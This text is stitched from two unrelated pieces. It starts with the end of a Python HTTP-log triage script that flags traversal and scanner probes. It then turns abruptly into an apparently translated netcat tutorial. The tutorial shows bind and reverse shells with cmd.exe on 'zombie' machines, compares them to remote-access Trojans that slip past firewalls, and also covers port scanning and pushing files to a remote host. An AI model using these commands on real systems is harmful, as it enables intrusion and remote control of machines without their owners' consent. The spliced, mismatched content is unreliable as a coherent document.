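    "GET /index.html HTTP/1.0\r\nHost: 127.0.0.1\r\n\r\n"
    "HEAD / HTTP/1.1\r\nHost: 127.0.0.1\r\nUser-Agent: scanner/1.0\r\n\r\n"
)

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/(?P<ver>\d\.\d)$")


def split_requests(log):
    """Each request's header section ends at the first blank line."""
    return [block for block in log.split("\r\n\r\n") if block.strip()]


def parse_request(block):
    """Return {'method','target','version','headers'}, or None if the first line is not a request line."""
    lines = block.split("\r\n")
    m = REQUEST_LINE.match(lines[0])
    if not m:
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"method": m["method"], "target": m["target"],
            "version": m["ver"], "headers": headers}


def suspicious(req):
    """Reasons a captured request looks like a traversal or scanner probe."""
    reasons = []
    path = req["target"].split("?", 1)[0]
    raw = unquote_to_bytes(path)          # decode %xx so encoded dots and slashes become visible
    if b".." in raw:
        reasons.append("dot-dot in path")
    if any(b >= 0x80 for b in raw):       # overlong/non-ASCII encodings hidden behind %xx
        reasons.append("non-ASCII bytes in percent-encoded path")
    if req["version"] == "1.1" and "host" not in req["headers"]:
        reasons.append("HTTP/1.1 request without Host header")
    return reasons


def triage(log):
    """(method, target, reasons) for every captured request that trips a check."""
    flagged = []
    for block in split_requests(log):
        req = parse_request(block)
        if req is None:
            continue
        reasons = suspicious(req)
        if reasons:
            flagged.append((req["method"], req["target"], reasons))
    return flagged


if __name__ == "__main__":
    for method, target, reasons in triage(SAMPLE_LOG):
        print(method, target, "->", "; ".join(reasons))
```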
Command 2: program orientation (method of bouncing shell)
nc -l -p port -t -e cmd.exe
Local machine: nc -l -p port  or  nc -l -v -p port
Target machine: nc -e cmd.exe ip port
Parameter explanation:
The two parameters -l and -p have already been explained.
-e: program redirection (run the given program on connect)
-t: reply in the form of telnet
Examples
nc -l -p 5277 -t -e cmd.exe    // never run this on your own machine; if you do, your machine becomes a TELNET server.
The command explains:
Listen for inbound connections on local port 5277 and redirect the CMD.exe program to port 5277. When someone connects, CMD.exe answers the connection request in TELNET form. Put bluntly, it turns the host into a TELNET zombie, so this command is meant to be run on your zombie.
For example, usage:
Local machine: nc -l -p port (or nc -l -v -p port)
Remote machine: nc -e cmd.exe ip port
As we all know, Grey Pigeon and God Thief, both of these tools use rebound port Trojans.
What is a bounce port?
That is, when the other side is infected with the Trojan, you do not have to connect to them actively, i.e. send a connection request from your client to the server running on their host; instead the other side connects to you. This defeats many firewalls, because many firewalls do not check outbound requests.
Combining the two commands here has the same effect as those two Trojans.
Local operation: nc -l -p 5277 (listen on local port 5277), or nc -l -v -p 5277
Then on the remote machine, find a way to run nc -e cmd.exe ip 5277
(do not literally type "ip" on the zombie; use the real address, xxx.xxx.xxx.xxx!)
That is the bounce: you get a SHELL on the local machine.
Command 3: scan Port
nc -v ip port
nc -v -z ip port-port
nc -v -z -u ip port-port
Parameter explanation:
-z: turn off input and output; used when scanning
nc -v ip port    // this command scans a single port
For example:
nc -v ip 135    // scan a port of the remote host to get some simple information about it; for some ports we can get more information
For example, port 80:
nc -v ip 80, then use the GET method to obtain information about the other side's WEB server.
nc -v -z ip port-port    // this command scans TCP ports quickly; port-port gives the range of ports to scan.
For example:
nc -v -z ip 1-200    // shows which of TCP ports 1-200 are open on my machine
nc -v -z -u ip port-port    // this command has one parameter more than the last one, -u; it still scans ports, but -u makes it scan UDP ports.
For example:
nc -v -z -u ip 1-200    // this command scans UDP ports 1-200
Command 4: transfer file (HOHO,I LIKE)
LOCAL MACHINE: nc -v -n ip port < x:\svr.exe
REMOTE MACHINE: nc -v -l -p port > Y:\svr.exe
Parameter explanation:
-n: use numeric IP addresses only
The two commands are combined to transfer files.
First, run the command on the remote machine:
nc -v -l -p 5277 > c:\pulist.exe
Remember this command? Ha ha, it looks like the listening command, right? Yes, that's right: this listens on port 5277
and writes the received data to c:\pulist.exe.
Run on the local machine at this time.
nc -v -n ip 5277 < e:\hack\pulist.exe
This command reads the contents of pulist.exe from the local E drive directory and sends the data to port 5277 of ip.
In this way, the remote host automatically creates a pulist.exe file.